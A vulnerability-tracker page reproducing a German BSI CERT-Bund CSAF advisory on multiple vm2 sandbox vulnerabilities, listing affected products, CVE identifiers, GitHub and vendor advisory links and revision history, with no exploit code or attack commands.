cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
Affected products
Known affected
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Open Source vm2 <3.11.1
Open Source / vm2
|
<3.11.1 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
Open Source vm2
Open Source / vm2
|
cpe:/a:vm2_project:vm2:-
|
— |
References
23 references
{
"document": {
"aggregate_severity": {
"text": "kritisch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "vm2 ist eine Sandbox, in der nicht vertrauensw\u00fcrdiger Code der in Node integrierten Module ausgef\u00fchrt werden kann.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in vm2 ausnutzen, um beliebigen Programmcode auszuf\u00fchren, um einen Denial of Service Angriff durchzuf\u00fchren, um Informationen offenzulegen, und um Sicherheitsvorkehrungen zu umgehen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1349 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1349.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1349 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1349"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-2cm2-m3w5-gp2f vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-47x8-96vw-5wg6 vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-55hx-c926-fr95 vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-6785-pvv7-mvg7 vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-6785-pvv7-mvg7"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-8hg8-63c5-gwmx vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-947f-4v7f-x2v8 vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-947f-4v7f-x2v8"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-9qj6-qjgg-37qq vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-9vg3-4rfj-wgcm vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-cp6g-6699-wx9c vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cp6g-6699-wx9c"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-ffh4-j6h5-pg66 vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-grj5-jjm8-h35p vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-hw58-p9xv-2mjh vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-hw58-p9xv-2mjh"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-mpf8-4hx2-7cjg vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mpf8-4hx2-7cjg"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-qcp4-v2jj-fjx8 vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-qvjj-29qf-hp7p vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-v27g-jcqj-v8rw vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v27g-jcqj-v8rw"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-v37h-5mfm-c47c vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-vwrp-x96c-mhwq vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-vwrp-x96c-mhwq"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-wp5r-2gw5-m7q7 vom 2026-05-03",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-7292 vom 2026-05-29",
"url": "http://linux.oracle.com/errata/ELSA-2026-7292.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:26234 vom 2026-06-16",
"url": "https://access.redhat.com/errata/RHSA-2026:26234"
}
],
"source_lang": "en-US",
"title": "vm2: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-06-16T22:00:00.000+00:00",
"generator": {
"date": "2026-06-17T09:01:01.290+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1349",
"initial_release_date": "2026-05-03T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-05-03T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-05-04T22:00:00.000+00:00",
"number": "2",
"summary": "Referenz(en) aufgenommen: EUVD-2026-26995, EUVD-2026-26993, EUVD-2026-26987, EUVD-2026-26984, EUVD-2026-26986"
},
{
"date": "2026-05-06T22:00:00.000+00:00",
"number": "3",
"summary": "CVE\u0027s erg\u00e4nzt"
},
{
"date": "2026-05-14T22:00:00.000+00:00",
"number": "4",
"summary": "Referenz(en) aufgenommen: EUVD-2026-30071, EUVD-2026-30079, EUVD-2026-30074, EUVD-2026-30073, EUVD-2026-30067, EUVD-2026-30076, EUVD-2026-30077, EUVD-2026-30075, EUVD-2026-30072, EUVD-2026-30069, EUVD-2026-30070, EUVD-2026-30078"
},
{
"date": "2026-05-31T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-06-16T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "6"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c3.11.1",
"product": {
"name": "Open Source vm2 \u003c3.11.1",
"product_id": "T053508"
}
},
{
"category": "product_version",
"name": "3.11.1",
"product": {
"name": "Open Source vm2 3.11.1",
"product_id": "T053508-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:vm2_project:vm2:3.11.1"
}
}
},
{
"category": "product_name",
"name": "Open Source vm2",
"product": {
"name": "Open Source vm2",
"product_id": "T053510",
"product_identification_helper": {
"cpe": "cpe:/a:vm2_project:vm2:-"
}
}
}
],
"category": "product_name",
"name": "vm2"
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-22709",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-22709"
},
{
"cve": "CVE-2026-24118",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-24118"
},
{
"cve": "CVE-2026-24120",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-24120"
},
{
"cve": "CVE-2026-24781",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-24781"
},
{
"cve": "CVE-2026-26332",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-26332"
},
{
"cve": "CVE-2026-26956",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-26956"
},
{
"cve": "CVE-2026-43997",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-43997"
},
{
"cve": "CVE-2026-43999",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-43999"
},
{
"cve": "CVE-2026-44000",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-44000"
},
{
"cve": "CVE-2026-44001",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-44001"
},
{
"cve": "CVE-2026-44002",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-44002"
},
{
"cve": "CVE-2026-44003",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-44003"
},
{
"cve": "CVE-2026-44005",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-44005"
},
{
"cve": "CVE-2026-44006",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-44006"
},
{
"cve": "CVE-2026-44007",
"product_status": {
"known_affected": [
"67646",
"T053508",
"T004914",
"T053510"
]
},
"release_date": "2026-05-03T22:00:00.000+00:00",
"title": "CVE-2026-44007"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…